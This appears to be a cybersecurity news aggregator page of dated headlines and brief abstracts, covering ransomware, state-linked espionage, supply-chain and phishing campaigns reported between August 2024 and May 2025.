Attack
May 13, 2025
DragonForce Goes Retail: Inside the Cyber Siege of M&S, Co-op, and Harrods Full Text
Abstract
DragonForce, a former hacktivist group turned Ransomware-as-a-Service (RaaS) operation, has launched a coordinated cyber offensive against major UK retailers—Marks & Spencer (M&S), Co-op, and Harrods.Irembezci
May 10, 2025
Over 40 Hacktivist Groups Target India in Coordinated Cyber Campaign: High Noise, Low Impact Full Text
Abstract
A coordinated cyber campaign dubbed #OpIndia was launched by over 40 ideologically motivated hacktivist groups following recent geopolitical tensions between India and Pakistan.The Cyber Express
May 9, 2025
Hackers Exploit Windows Remote Management to Evade Detection in AD Networks Full Text
Abstract
A new wave of cyberattacks is exploiting WinRM to conduct stealthy lateral movement within AD environments. By leveraging this legitimate administrative tool, attackers evade detection and blend into normal network activity.GBHackers
May 5, 2025
Threat Actors Target Critical National Infrastructure with New Malware and Tools Full Text
Abstract
Between April and November 2024, attackers exfiltrated targeted email data and mapped virtualization infrastructure. Following containment efforts in late 2024, they escalated operations by deploying additional web shells, SystemBC and MeshCentral.GBHackers
May 2, 2025
Harrods becomes latest retailer to announce attempted cyberattack Full Text
Abstract
Harrods, the luxury department store in London, has become the latest U.K. retailer to announce detecting an attempted cyberattack following similar announcements by Marks & Spencer and the Co-op.The Record
April 29, 2025
Spike in Git Configuration Crawling Highlights Risk of Codebase Exposure Full Text
Abstract
A major spike in cyber reconnaissance was observed between April 20–21, 2025, with over 4,800 unique IPs attempting to access Git configuration files. This marked the fourth and largest such spike since September 2024.Grey Noise
April 29, 2025
French BEC Threat Actor Targets Property Payments Full Text
Abstract
TA2900, is targeting French-speaking individuals with fraudulent rental payment schemes. The campaigns are designed to steal funds by impersonating rental agencies and redirecting rent payments to attacker-controlled bank accounts.Proof Point
April 29, 2025
Finding Minhook in a sideloading attack – and Sweden too Full Text
Abstract
A sideloading campaign active from late 2023 to early 2024 targeted organisations in East Asia and later Sweden, delivering Cobalt Strike payloads via legitimate Windows executables and malicious DLLs.Sophos
April 23, 2025
Hackers Deploy New Malware Disguised as Networking Software Updates Full Text
Abstract
A sophisticated backdoor campaign is actively targeting Russian government, financial, and industrial sectors by masquerading as legitimate ViPNet software updates. The malware leverages trusted update mechanisms to infiltrate systems.GBHackers
April 21, 2025
Zoom has a remote control feature and crypto thieves are abusing it - Risky Business Media Full Text
Abstract
A newly uncovered campaign by the threat group ELUSIVE COMET exploits Zoom’s remote control feature to hijack victims’ systems. The attackers use social engineering tactics, impersonating Bloomberg Crypto.Risky
April 21, 2025
Chinese Ghost Hackers Hit Hospitals And Factories In America And U.K. Full Text
Abstract
Ghost ransomware hackers strike in 70 countries. However, North America and the U.K. have been most attacked by the Ghost ransomware hackers. The campaigns are operated by a financially motivated group from China.Forbes
April 18, 2025
SCAMONOMICS THE DARK SIDE OF STOCK & CRYPTO INVESTMENTS IN INDIA Full Text
Abstract
A coordinated fraud campaign is targeting investors using fake investment platforms, impersonation tactics, and compromised legitimate websites. These schemes aim to steal financial data and defraud victims through social engineering.Cyfirma
April 15, 2025
Hackers Use Microsoft Teams Chats to Deliver Malware to Windows PCs Full Text
Abstract
A sophisticated cyberattack campaign has emerged, leveraging Microsoft Teams chats to infiltrate Windows PCs with malware, according to a recent report by cybersecurity firm ReliaQuest.GBHackers
April 10, 2025
GOFFEE’s recent attacks: new tools and techniques Full Text
Abstract
GOFFEE continued to launch targeted attacks against organizations in Russia, utilizing PowerTaskel, a non-public Mythic agent written in PowerShell, and introducing a new implant that researchers dubbed “PowerModul”.Security List
April 8, 2025
ToddyCat Group Abused Flaw in ESET Security Software to Plant Malicious DLLs Full Text
Abstract
During the campaign, the hackers exploited the ESET vulnerability (CVE-2024-11859) to load a new tool dubbed TCDSB onto victims' devices, disguising it as a legitimate DLL — a common file type in the Windows operating system.The Record
March 31, 2025
Russian Intelligence-backed Campaigns Impersonate the CIA to Target Ukraine Sympathizers, Russian Citizens, and Informants Full Text
Abstract
Silent Push Threat Analysts discovered a phishing campaign using website lures to gather information against Russian individuals sympathetic to defending Ukraine and willing to share sensitive information.Silent Push
March 27, 2025
New SparrowDoor Backdoor Variants Found in Attacks on U.S. and Mexican Organizations Full Text
Abstract
The Chinese threat actor known as FamousSparrow has been linked to a cyber attack targeting a trade group in the United States and a research institute in Mexico to deliver its flagship backdoor SparrowDoor and ShadowPad.The Hacker News
March 26, 2025
Browser-in-the-Browser Attacks Target CS2 Players’ Steam Accounts Full Text
Abstract
This phishing technique creates fake browser windows within real browser windows (Browser in the Browser) to create login pages or other realistic forms to steal users' credentials or one-time MFA passcodes (OTP).Bleeping Computer
March 25, 2025
Cyberattack Hits Ukrainian State Railway, Disrupting Online Ticket Sales Full Text
Abstract
The attack disrupted online services, including the mobile app used for ticket purchases, but did not affect train schedules, Ukrzaliznytsia said. The railway operator is investigating the incident along with Ukraine’s security services.The Record
March 24, 2025
Cybercriminals Exploit Check Point Driver Flaws in Malicious Campaign Full Text
Abstract
A security researcher found that a component of Check Point’s ZoneAlarm antivirus software is being exploited by threat actors in malicious campaigns to bypass Windows security measures.Infosecurity Magazine
March 20, 2025
Hackers Exploit Severe PHP Flaw to Deploy Quasar RAT and XMRig Miners Full Text
Abstract
Bitdefender reported that hackers are exploiting a severe PHP flaw, CVE-2024-4577, on Windows CGI systems, deploying Quasar RAT and XMRig miners, with significant attacks in Taiwan, Hong Kong, and Brazil since late 2024.The Hacker News
March 19, 2025
Update: GitHub Action Hack Likely Led to Another in Cascading Supply Chain Attack Full Text
Abstract
A cascading supply chain attack that began with the compromise of the "reviewdog/action-setup@v1" GitHub Action is believed to have led to the recent breach of "tj-actions/changed-files" that leaked CI/CD secrets.Bleeping Computer
March 18, 2025
Attackers Exploit OpenAI ChatGPT Vulnerability in the Wild Full Text
Abstract
A server-side request forgery (SSRF) vulnerability in ChatGPT, tracked as CVE-2024-27564, has become a significant target for cybercriminals, with over 10,479 attack attempts recorded from a single malicious IP, according to Veriti’s latest research.Security Online
March 12, 2025
Update: Critical PHP RCE vulnerability Mass Exploited in New Attacks Full Text
Abstract
GreyNoise detected 1,089 unique IPs exploiting CVE-2024-4577 in January 2025, with attacks spreading beyond Japan to Singapore, Indonesia, the UK, Spain, and India. Over 43% of attacks originate from Germany and China.Bleeping Computer
March 11, 2025
Blind Eagle: …And Justice for All - Check Point Research Full Text
Abstract
Check Point Research discovered a series of ongoing campaigns targeting Colombian institutions and government entities since November 2024. The campaigns are linked to Blind Eagle and deliver malicious .url files.CheckPoint
March 10, 2025
Majority of Orgs Hit by AI Cyber-Attacks as Detection Lags Full Text
Abstract
Most (87%) security professionals have reported that their organization has encountered an AI-driven cyber-attack in the last year, with the technology increasingly takes hold, according to a new report by SoSafe.Infosecurity Magazine
March 8, 2025
Akira Ransomware Gang Encrypted Network From a Webcam to Bypass EDR Full Text
Abstract
The Akira ransomware gang was spotted using an unsecured webcam to launch encryption attacks on a victim's network, effectively circumventing Endpoint Detection and Response (EDR), which was blocking the encryptor in Windows.Bleeping Computer
March 8, 2025
Russia Claims Ukraine Hacked State Youth Organizations to Recruit Minors Full Text
Abstract
A Russian security agency has accused Ukraine of hacking two Kremlin-backed youth military-patriotic organizations to gather student data for potential recruitment in espionage or terrorist activities.The Record
March 7, 2025
New ‘Desert Dexter’ Campaign Hits Over 900 Victims in Middle East, North Africa, and Other Regions Full Text
Abstract
The threat actors behind Desert Dexter employ a multi-stage attack chain that leverages social media platforms, legitimate file-sharing services, and geopolitical lures to distribute a modified version of the AsyncRAT malware.GBHackers
March 6, 2025
China-Linked Silk Typhoon Expands Cyberattacks to IT Supply Chains for Initial Access Full Text
Abstract
The China-linked threat actor behind the zero-day exploitation of security flaws in Microsoft Exchange servers in January 2021 has shifted its tactics to target the IT supply chain as a means to obtain initial access to corporate networks.The Hacker News
March 6, 2025
Sophisticated Business Email Compromise Attack Targets B2B Transactions Full Text
Abstract
The attack involved three business partners (Partner A, Partner B, and Partner C) exchanging invoices via email. The threat actor gained access to a third-party email server, giving them complete visibility into ongoing transactions.Trend Micro
March 5, 2025
New Cyber-Espionage Campaign Targets UAE Aviation Sector and Transport Infrastructure Full Text
Abstract
The attack campaign, attributed by Proofpoint to a cluster known as UNK_CraftyCamel, employed a sophisticated infection chain to deploy a newly discovered backdoor named Sosano.Infosecurity Magazine
February 22, 2025
REF7707 Espionage Campaign Targets South America and Southeast Asia Full Text
Abstract
The attackers behind REF7707 deployed novel malware families—FINALDRAFT, GUIDLOADER, and PATHLOADER—to gain persistence and execute highly sophisticated network intrusions.Security Online
February 15, 2025
China’s Salt Typhoon Hackers Targeting Cisco Devices Used by Telcos, Universities Full Text
Abstract
Recorded Future researchers said the Chinese nation-state threat group intruded five additional telecom networks between December and January, including two unnamed providers in the U.S..CyberScoop
February 12, 2025
Attackers Exploit a New Zero-Day to Hijack Fortinet Firewalls Full Text
Abstract
Fortinet warned that threat actors are exploiting a new zero-day vulnerability, tracked as CVE-2025-24472 (CVSS score of 8.1), in FortiOS and FortiProxy to hijack Fortinet firewalls.Security Affairs
February 12, 2025
Triplestrength Hits Victims With Ransomware, Cloud Hijacks, Cryptomining Full Text
Abstract
A previously unknown gang dubbed Triplestrength poses a triple threat to organizations: It infects victims' computers with ransomware, then hijacks their cloud accounts to illegally mine for cryptocurrency.The Register
February 11, 2025
DragonRank Exploits IIS Servers with BadIIS Malware for SEO Fraud and Gambling Redirects Full Text
Abstract
Targets of the campaign include IIS servers located in India, Thailand, Vietnam, Philippines, Singapore, Taiwan, South Korea, Japan, and Brazil. These servers are associated with government, universities, tech companies, and telecommunications firms.The Hacker News
February 10, 2025
Microsoft Says Attackers Use Exposed ASP.NET Keys to Deploy Malware Full Text
Abstract
Threat actors also use machine keys from publicly available sources in code injection attacks to create malicious ViewStates (used by ASP.NET Web Forms to control state and preserve pages) by attaching crafted message authentication code (MAC).Bleeping Computer
February 10, 2025
Massive Brute Force Attack Uses 2.8 Million IPs to Target VPN Devices Full Text
Abstract
A large-scale brute force password attack using almost 2.8 million IP addresses is underway, attempting to guess the credentials for a wide range of networking devices, including those from Palo Alto Networks, Ivanti, and SonicWall.Bleeping Computer
February 7, 2025
Attackers Use NOVA Stealer to Target Russian Organizations Full Text
Abstract
The BI.ZONE Threat Intelligence team has reported a significant ongoing campaign distributing the NOVA stealer, a new commercial variant of the SnakeLogger malware. This campaign is primarily targeting Russian organizations across various sectors.BI.Zone
February 5, 2025
Ukrainian Organizations Targeted in Zero-Day Campaign and Homoglyph Attacks Full Text
Abstract
The vulnerability was actively exploited by Russian cybercrime groups through spear-phishing campaigns, using homoglyph attacks to spoof document extensions and trick users and the Windows Operating System into executing malicious files.Trend Micro
February 4, 2025
Kazakhstan to Audit Foreign Ministry After Suspected Russia-Linked Cyberattack Full Text
Abstract
The hacker group behind this operation — tracked as UAC-0063 — is potentially linked to the Russian state-sponsored threat actor APT28, also known as Fancy Bear or BlueDelta.The Record
February 3, 2025
Meta Confirms Zero-Click WhatsApp Spyware Attack Targeting 90 Journalists, Activists Full Text
Abstract
The campaign, which targeted around 90 members, involved the use of spyware from an Israeli company known as Paragon Solutions. The attackers were neutralized in December 2024.The Hacker News
February 1, 2025
Syncjacking Attack Enables Full Browser and Device Takeover Full Text
Abstract
The new attack method, discovered by security researchers at SquareX, involves several steps, including Google profile hijacking, browser hijacking, and, eventually, device takeover.Infosecurity Magazine
February 1, 2025
HTTP Client Tools Exploitation for Account Takeover Attacks Full Text
Abstract
Most HTTP-based cloud attacks utilize brute force methods, resulting in low success rates. Proofpoint found that a recent campaign using the unique HTTP client Axios had an especially high success rate, compromising 43% of targeted user accounts.Proofpoint
January 31, 2025
Stealthy Attack Deploys Coyote Banking Trojan via LNK Files Full Text
Abstract
Once deployed, the Coyote Banking Trojan can carry out various malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal sensitive credentials.Fortinet
January 22, 2025
Russian Telecom Giant Rostelecom Investigates Suspected Cyberattack on Contractor Full Text
Abstract
The company stated that the contractor is responsible for maintaining Rostelecom’s corporate website and procurement portal, both of which were reportedly targeted by hackers.The Record
January 17, 2025
Hackers Use Google Search Ads to Steal Google Ads Accounts Full Text
Abstract
The attackers are running ads on Google Search impersonating Google Ads, showing as sponsored results that redirect potential victims to fake login pages hosted on Google Sites but looking like the official Google Ads homepage.Bleeping Computer
January 14, 2025
Snoops exploited Fortinet firewalls with ‘probable’ 0-day Full Text
Abstract
Miscreants running a "mass exploitation campaign" against Fortinet firewalls, which peaked in December, may be using an unpatched zero-day vulnerability to compromise the equipment.The Register
January 13, 2025
High-Traffic Sites Attacked in “zqxq” Campaign Through Obfuscated Javascript Injection Full Text
Abstract
The malware used in the campaign hides in legitimate files using scrambled variables and custom functions like HttpClient, rand, and token. These methods evade detection and hinder analysis by researchers.Maleware Bytes
January 13, 2025
RedDelta Deploys PlugX Malware to Target Mongolia and Taiwan in Espionage Campaigns Full Text
Abstract
Mongolia, Taiwan, Myanmar, Vietnam, and Cambodia have been targeted by the China-nexus RedDelta threat actor to deliver a customized version of the PlugX backdoor between July 2023 and December 2024.Cyware
January 10, 2025
MirrorFace Leverages ANEL and NOOPDOOR in Multi-Year Cyberattacks on Japan Full Text
Abstract
Japanese authorities have accused a China-linked hacking group, known as MirrorFace, of carrying out a long-running cyberattack campaign against organizations and individuals in Japan since 2019.The Hacker News
January 7, 2025
Supply Chain Attack Targets Key Ethereum Development Tools Full Text
Abstract
This attack, discovered by Socket, involves the distribution of 20 malicious npm packages created by three primary authors. One package, @nomicsfoundation/sdk-test, was downloaded 1092 times.Infosecurity Magazine
December 30, 2024
North Korean Hackers Deploy OtterCookie Malware in Contagious Interview Campaign Full Text
Abstract
North Korean threat actors behind the ongoing Contagious Interview campaign have been observed dropping a new JavaScript malware called OtterCookie. The development is a sign that the threat actors are actively updating their tools.Cyware
December 21, 2024
Lazarus Group Spotted Targeting Nuclear Engineers with CookiePlus Malware Full Text
Abstract
The Lazarus Group, an infamous North Korea threat actor, has been observed leveraging a "complex infection chain" targeting at least two employees belonging to an unnamed nuclear-related organization within the span of one month in January 2024.The Hackers
December 17, 2024
Novel ‘TPUXtract’ Attack can Infer the Internal Structure of AI Models Full Text
Abstract
Researchers at North Carolina State University demonstrated how to recreate a neural network using the electromagnetic (EM) signals emanating from the chip it runs on using a new method called "TPUXtract."Dark Reading
December 7, 2024
Romania’s Election Systems Targeted in Over 85,000 Cyberattacks Full Text
Abstract
Threat actors obtained access credentials for election-related websites and leaked them on a Russian hacker forum less than a week before the first presidential election round.Bleeping Computer
December 7, 2024
Threat Actor Targets Manufacturing Industry With Lumma Stealer and Amadey Bot Full Text
Abstract
This campaign leverages multiple Living-off-the-Land Binaries (LOLBins), such as ssh.exe, powershell.exe, and mshta.exe, to bypass traditional security mechanisms and remotely execute the next-stage payload.Cyble
December 5, 2024
Cloudflare’s Developer Domains Increasingly Abused by Threat Actors Full Text
Abstract
Cloudflare's 'pages.dev' and 'workers.dev' domains, used for deploying web pages and facilitating serverless computing, are being increasingly abused by cybercriminals for phishing and other malicious activities.Bleeping Computer
December 2, 2024
SmokeLoader Malware Campaign Targets Companies in Taiwan Full Text
Abstract
SmokeLoader is a modular malware known for its adaptability and evasion techniques. It is being used in this attack to directly execute its payloads rather than serving as a downloader for other malicious software.Infosecurity Magazine
November 29, 2024
MUT-8694 Supply Chain Attack Targets npm and PyPI Ecosystems Full Text
Abstract
Datadog’s analysis revealed 42 malicious PyPI packages and 18 npm packages linked to the campaign, each mimicking legitimate libraries. The PyPI packages falsely claimed to resolve DLL and API issues, while many npm packages referenced Roblox.Security Online
November 26, 2024
Zyxel Firewalls Targeted in Recent Ransomware Attacks Full Text
Abstract
Zyxel warns that a ransomware gang has been exploiting a recently patched command injection vulnerability, CVE-2024-42057, in its firewalls for initial compromise. Remote, unauthenticated attackers could exploit the flaw to execute OS commands.Security Affairs
November 23, 2024
China-Linked TAG-112 Targets Tibetan Media with Cobalt Strike Espionage Campaign Full Text
Abstract
A China-linked nation-state group called TAG-112 compromised Tibetan media and university websites in a new cyber espionage campaign designed to facilitate the delivery of the Cobalt Strike post-exploitation toolkit.The Hacker News
November 23, 2024
China-linked hackers target Linux systems with new spying malware Full Text
Abstract
According to the researchers, a China-linked state-sponsored threat actor has been targeting Linux systems with previously unknown malware strains in a new espionage campaign.The Record
November 21, 2024
Dozens of Central Asian targets hit in recent Russia-linked cyber-espionage campaign Full Text
Abstract
Researchers have identified an ongoing Russia-linked cyber-espionage campaign targeting human rights groups, private security companies, and state and educational institutions in Central Asia, East Asia, and Europe using custom malware.The Record
November 20, 2024
Ghost Tap: Hackers Exploiting NFCGate to Steal Funds via Mobile Payments Full Text
Abstract
The technique, codenamed Ghost Tap by ThreatFabric, enables cybercriminals to cash-out money from stolen credit cards linked to mobile payment services such as Google Pay or Apple Pay and relaying NFC traffic.The Hacker News
November 19, 2024
Hackers Hijack Unsecured Jupyter Notebooks to Stream Illegal Sports Broadcasts Full Text
Abstract
The attacks involve the hijack of unauthenticated Jupyter Notebooks to establish initial access, and perform a series of actions designed to facilitate illegal live streaming of sports events.The Hacker News
November 16, 2024
New LodaRAT Campaign Targets Global Victims with Updated Capabilities Full Text
Abstract
Researchers at Rapid7 have uncovered a new campaign using LodaRAT, a well-known remote access tool active since 2016. The latest variant expands by targeting cookies and credentials from Microsoft Edge and Brave browsers.Security Online
November 16, 2024
Sliver and Ligolo-ng Attack Leverages Y Combinator Brand Full Text
Abstract
Security researchers at Hunt.io have found a recent cyber operation using the Sliver command-and-control (C2) framework and Ligolo-ng tunneling tool. The operation targeted victims using the trusted name of Y Combinator.Security Online
November 16, 2024
Sitting Ducks DNS Attacks Put Global Domains at Risk Full Text
Abstract
Using the Sitting Ducks attack, cybercriminals have taken control of many domain names since 2018, impacting numerous well-known companies, non-profits, and government entities.Infosecurity Magazine
November 13, 2024
Hamas Tied to October Wiper Attacks Using Eset Email Full Text
Abstract
Check Point Research indicated that WIRTE has expanded from espionage to include disruptive attacks. Evidence shows that the malware employed by this group is connected to SameCoin, a wiper malware that has previously affected Israeli entities.Healthcare Infosecurity
November 9, 2024
China-Aligned MirrorFace Hackers Target EU Diplomats with World Expo 2025 Bait Full Text
Abstract
MirrorFace, a Chinese state-linked threat actor, targeted a diplomatic organization in the European Union for the first time. The attack used the World Expo 2025 in Osaka, Japan, as a lure.The Hacker News
November 9, 2024
Silent Skimmer Gets Loud Again Full Text
Abstract
During a Silent Skimmer campaign in May 2024, attackers gained access to servers by exploiting outdated Telerik UI vulnerabilities, deploying reverse shells, and using tools like GodPotato for privilege escalation.Palo Alto Networks
November 8, 2024
Threat Actors Behind VEILDrive Campaign Exploit Microsoft Services for C2 Full Text
Abstract
The ongoing threat campaign known as VEILDrive is utilizing Microsoft services such as Teams, SharePoint, Quick Assist, and OneDrive in its operations to distribute spear-phishing attacks and store malware.Hunters
November 4, 2024
Supply Chain Attack on Popular Animation Library Lottie-Player Targets Web3 Users Full Text
Abstract
Malicious actors executed a sophisticated supply chain attack on the widely-utilized JavaScript library lottie-player, infecting versions 2.0.5, 2.0.6, and 2.0.7 with malicious code that prompts a fake Web3 wallet connection.Cyware
November 4, 2024
Sophos Mounted Counter-Offensive Operation to Foil Chinese Attackers Full Text
Abstract
Sophos research uncovered adversarial tactics including the Cloud Snooper backdoor, Asnarök botnet campaign, UEFI bootkit exploits, and the CVE-2022-1040 zero-day vulnerability, all intercepted before harming targeted organizations.Cyware
October 31, 2024
Massive PSAUX Ransomware Attack Targets 22,000 CyberPanel Instances Full Text
Abstract
LeakIX reported over 21,000 vulnerable CyberPanel instances exposed online, mainly in the U.S. Overnight, cybercriminals likely exploited these servers, installing the PSAUX ransomware to drastically reduce the number of exposed instances.Bleeping Computer
October 29, 2024
Russia Targets Ukrainian Military via Spoofed Recruitment App Full Text
Abstract
Researchers from Google's Threat Intelligence Group (TAG) and Mandiant have identified a campaign named UNC5812 that uses a fake version of the "Civil Defense" tool to drop malware and spread misinformation.Dark Reading
October 28, 2024
HeptaX Cyberespionage Campaign Snoops Through Unauthorized RDP Connections Full Text
Abstract
The attackers heavily rely on PowerShell and BAT scripts to download additional payloads and create an administrative user account on compromised systems, lowering authentication barriers for unauthorized remote access.Cyware
October 23, 2024
Attackers Target Exposed Docker Remote API Servers With perfctl Malware Full Text
Abstract
The attack sequence starts with probing the Docker Remote API server by pinging it, creating a container with specific settings, and executing payloads using the Docker Exec API.Trend Micro
October 22, 2024
Chinese Nation-State Hackers APT41 Hit Gambling Sector for Financial Gain Full Text
Abstract
APT41, a Chinese nation-state actor, conducted a cyberattack targeting the gambling and gaming industry. Over six months, they gathered valuable information from a company including network configurations and user passwords.Cyware
October 17, 2024
Hackers Target Ukraine’s Potential Conscripts With MeduzaStealer Malware Full Text
Abstract
Hackers are targeting potential conscripts in Ukraine with the MeduzaStealer malware, distributed through a Telegram account disguised as a technical support bot for the Reserve+ government app.The Record
October 15, 2024
Earth Simnavaz Levies Advanced Cyberattacks Against UAE and Gulf Regions Full Text
Abstract
The group uses sophisticated tactics like leveraging Microsoft Exchange servers for credentials theft and exploiting vulnerabilities for privilege escalation. They blend malicious activity with normal network traffic to evade detection.Trend Micro
October 10, 2024
Progress Telerik UI, Cisco ASA WebVPN, QNAP QTS, and Linux Systems Under Attack Full Text
Abstract
Vulnerabilities in Progress Telerik UI for WPF and D-Link routers have been exploited, along with the targeting of QNAP QTS firmware and Cisco ASA WebVPN. Additionally, critical flaws in PHP, GeoServer, and AVTECH IP cameras are under attack.The Cyber Express
October 7, 2024
China-linked CeranaKeeper Group Targets Southeast Asia with Data Exfiltration Attacks Full Text
Abstract
The custom toolset used by the Thailand-based CeranaKeeper group includes WavyExfiller, DropboxFlop, OneDoor, and BingoShell for various data exfiltration and remote control purposes.The Hacker News
October 7, 2024
Royal Mail-Themed Lures Deliver Open Source Prince Ransomware Full Text
Abstract
Hackers posed as the UK's Royal Mail to spread Prince ransomware in a destructive campaign that targeted organizations in the US and UK in mid-September. Unlike typical ransomware attacks, this campaign had no decryption methods.Proof Point
September 28, 2024
BBTok Targeting Brazil Using the AppDomain Manager Injection Technique Full Text
Abstract
The Brazilian-targeted threat BBTok has a complex infection chain that starts with an email containing an ISO image. The malware compiles C# code directly on the infected machine and uses the AppDomain Manager Injection technique.GData Software
September 28, 2024
Hackers Deploy AI-Written Malware in Targeted Attacks Full Text
Abstract
Hackers are now using AI-generated malware in targeted attacks. In a recent email campaign in France, researchers found malicious code crafted with the help of generative AI to distribute the AsyncRAT malware.Bleeping Computer
September 21, 2024
Clever ‘GitHub Scanner’ Campaign Abusing Repositories to Push Malware Full Text
Abstract
A sophisticated campaign is using GitHub repositories to spread the Lumma Stealer malware, targeting users interested in open-source projects or receiving email notifications from them.Bleeping Computer
September 19, 2024
Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC Region Full Text
Abstract
In this campaign aimed at the APAC region, Earth Baxia used a new backdoor named EAGLEDOOR, which supports multiple communication protocols for information gathering and payload delivery.TrendMicro
September 14, 2024
Fileless Remcos RAT Campaign Leverages CVE-2017-0199 Flaw Full Text
Abstract
In a newly uncovered advanced malware campaign, threat actors are using a complex, fileless approach to deliver the Remcos Remote Access Trojan (RAT), leveraging a benign-looking Excel document as the attack vector.Security Online
September 14, 2024
Targeted Campaigns in Retail Sector Involve Domain Fraud, Brand Impersonation, and Ponzi Schemes Full Text
Abstract
Threat actors are actively engaging in domain fraud, brand impersonation, and Ponzi schemes targeting the retail sector, which plays a significant role in the global economy.Domain Tools
September 14, 2024
Update: Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities Full Text
Abstract
Trend Micro researchers uncovered remote code execution attacks targeting Progress Software's WhatsUp Gold using the vulnerabilities tracked as CVE-2024-6670 and CVE-2024-6671.Trend Micro
September 11, 2024
Chinese ‘Crimson Palace’ Espionage Campaign Keeps Hacking Southeast Asian Governments Full Text
Abstract
A sophisticated trio of Chinese cyberespionage groups known as Cluster Alpha, Cluster Bravo, and Cluster Charlie are behind the Crimson Palace espionage campaign targeting government organizations in Southeast Asia.The Record
September 10, 2024
Kimsuky-linked Hackers Use Similar Tactics to Attack Russia and South Korea Full Text
Abstract
Known as Konni, the threat actor uses similar tactics in both countries since at least 2021, targeting entities like the Russian Ministry of Foreign Affairs, the Russian Embassy in Indonesia, and South Korean businesses, including a tax law firm.The Record
September 10, 2024
‘TIDrone’ Cyberattackers Target Taiwan’s Drone Manufacturers Full Text
Abstract
TIDrone, linked to Chinese-speaking groups, deploys advanced malware through ERP software or remote desktop tools. Trend Micro identified the threat actor as actively pursuing military and satellite industrial supply chains in Taiwan.Dark Reading
September 10, 2024
Cybercriminals Target Latin American Banks with Mekotio, BBTok, and Grandoreiro Trojans Full Text
Abstract
These campaigns aim to steal sensitive banking credentials using innovative tactics, expanding beyond traditional regions like Brazil and Argentina to industries such as manufacturing, retail, and financial services. (Security Online)
September 7, 2024
BlindEagle Targets Colombian Insurance Sector with BlotchyQuasar Full Text
Abstract
The BlindEagle APT group has recently targeted the Colombian insurance sector. The attack chain starts with a phishing email impersonating DIAN, the Colombian tax authority. (Zscaler)
September 5, 2024
Intricate Babylon RAT Campaign Targets Malaysian Politicians, Government Full Text
Abstract
This campaign, active since July, utilizes at least three malicious ISO files to compromise Malaysian entities, containing components like a malicious executable and a decoy PDF file, ultimately delivering the Babylon RAT as a final payload. (Cyble)
September 5, 2024
Revival Hijack Attack Puts 22,000 PyPI Packages at Risk of Hijack Full Text
Abstract
This method could potentially lead to numerous malicious package downloads. The attack involves hijacking popular projects by registering new projects under the names of removed packages on PyPI. (JFrog)
September 3, 2024
Roblox Developers Under Attack by New Malicious NPM Campaign Full Text
Abstract
Roblox developers are being targeted by a new malicious npm campaign. Cybercriminals have created fake Roblox npm packages with the aim of deploying a remote access trojan called Quasar. (TechRadar)
September 2, 2024
GreenCharlie Infrastructure Targeting US Political Entities with Advanced Phishing and Malware Full Text
Abstract
GreenCharlie attackers use dynamic DNS providers to register domains for phishing attacks, with deceptive themes like cloud services and document visualization to trick victims into revealing sensitive information or downloading malware payloads. (Recorded Future)
September 2, 2024
North Korean Cyberattacks Persist: Developers Targeted via npm Packages Full Text
Abstract
The campaign, known as "Contagious Interview," tricks developers into downloading fake npm packages or installers. The attackers deploy a Python payload named InvisibleFerret to steal data from cryptocurrency wallets. (Security Online)
August 31, 2024
New Snake Keylogger Variant Slithers Into Phishing Campaigns Full Text
Abstract
The attack starts with a phishing email disguised as a fund transfer notification, with an attached Excel file named “swift copy.xls” that triggers the deployment of Snake Keylogger on the victim's computer upon opening. (Security Online)
August 31, 2024
Suspected Espionage Campaign Delivers New Voldemort Malware Full Text
Abstract
The campaign, which targeted organizations worldwide, involved impersonating tax authorities from various countries and utilizing Google Sheets for command and control (C2). (Proofpoint)
August 27, 2024
New Cheana Stealer Threat Targets VPN Users Across Multiple Operating Systems Full Text
Abstract
This campaign is notable for its malicious apps for Windows, Linux, and macOS users. The attackers have created different versions of Cheana Stealer for each OS to widen their attack surface. (The Cyber Express)
August 27, 2024
India’s Critical Infrastructure Suffers Spike in Cyberattacks Full Text
Abstract
India is experiencing a rise in cyberattacks on its critical infrastructure, particularly in the financial and government sectors, prompting the Reserve Bank of India to issue warnings about the need for enhanced cybersecurity measures. (Dark Reading)
August 24, 2024
Hackers Now Use AppDomain Injection to Drop Cobalt Strike Beacons Full Text
Abstract
Hackers are now using AppDomain Injection to drop Cobalt Strike beacons in a series of attacks that began in July 2024. This technique, known as AppDomain Manager Injection, can weaponize any Microsoft .NET application on Windows. (Bleeping Computer)
August 21, 2024
TA453 Targets Religious Figure with Fake Podcast Invite Delivering New BlackSmith Malware Toolset Full Text
Abstract
Iran-linked TA453 targeted a religious figure with a fake podcast interview invitation, attempting to deliver the BlackSmith malware toolkit. The initial lure involved an email leading to a malicious link containing the AnvilEcho PowerShell trojan. (Proofpoint)
August 21, 2024
New Msupedge Backdoor Targeting Taiwan Employs Stealthy Communications Full Text
Abstract
Hackers have been using a PHP vulnerability to deploy a stealthy backdoor called Msupedge. This backdoor was recently used in a cyberattack against an unnamed university in Taiwan. (Symantec)
August 19, 2024
Update: Windows Zero-Day Flaw was Exploited by North Korea-linked Lazarus APT Full Text
Abstract
Microsoft has patched a zero-day vulnerability, known as CVE-2024-38193, that was being exploited by the North Korea-linked Lazarus APT group. This vulnerability is a privilege escalation issue in the Windows Ancillary Function Driver for WinSock. (Security Affairs)
August 17, 2024
Dozens of Google Products Targeted by Scammers via Malicious Search Ads Full Text
Abstract
Scammers have been targeting dozens of Google products through malicious search ads. They impersonated Google's product line and used Looker Studio to lock up Windows and Mac users' browsers. (Malwarebytes)
August 17, 2024
A Deep Dive Into a New ValleyRAT Campaign Targeting Chinese Speakers Full Text
Abstract
The malware masquerades as legitimate applications like Microsoft Office and creates an empty file to lure users. It also checks for virtual machines and uses sleep obfuscation to evade memory scanners. (Fortinet)
August 15, 2024
Ongoing Social Engineering Campaign Refreshes Payloads Full Text
Abstract
Rapid7 identified multiple intrusion attempts by threat actors utilizing social engineering tactics on June 20, 2024. The threat actors use email bombs followed by calls to offer fake solutions, with recent incidents involving Microsoft Teams calls. (Rapid7)
August 13, 2024
New Dark Skippy Attack Let Hackers Steal Secret Keys From Signing Devices Full Text
Abstract
The "Dark Skippy" method allows hackers to steal Bitcoin hardware wallet keys by embedding secret data into public Bitcoin transactions, which can then be used to extract a person's seed words. (Cybersecurity News)
August 10, 2024
North Korea Kimsuky Launch Phishing Attacks on Universities Full Text
Abstract
Cybersecurity analysts have uncovered critical details about the North Korean advanced persistent threat (APT) group Kimsuky, which has been targeting universities as part of its global espionage operations. (Infosecurity Magazine)
August 6, 2024
